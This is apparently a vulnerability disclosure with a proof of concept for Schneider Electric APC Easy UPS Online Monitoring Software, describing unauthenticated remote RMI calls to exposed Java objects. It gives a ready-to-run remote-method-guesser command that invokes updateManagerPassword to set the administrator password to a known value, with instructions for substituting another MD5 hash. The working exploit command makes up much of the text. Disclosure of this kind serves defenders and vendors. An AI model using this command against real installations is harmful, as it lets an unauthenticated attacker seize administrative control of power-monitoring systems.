A vulnerability in Schneider Electric APC Easy UPS Online Monitoring Software V2.5-GS-01-22320 allows an unauthenticated remote attacker to issue RMI calls to certain remote Java objects in the application.
For example, the attacker can invoke cn.com.voltronicpower.rmiclass.SystemService.updateManagerPassword() to change the administrator password for the monitoring software.
POC:
- Install remote-method-guesser ( - Run: java -jar rmg-4.3.1-jar-with-dependencies.jar call41009 '"482c811da5d5b4bc6d497ffa98491e38"' --signature 'String updateManagerPassword(String managerPassword)' --bound-name system - This command attempts to change the application's Administrator password to "password123" (without quotes) - To reset to a different password, replace 482c811da5d5b4bc6d497ffa98491e38 with the MD5 hash hex string of a given password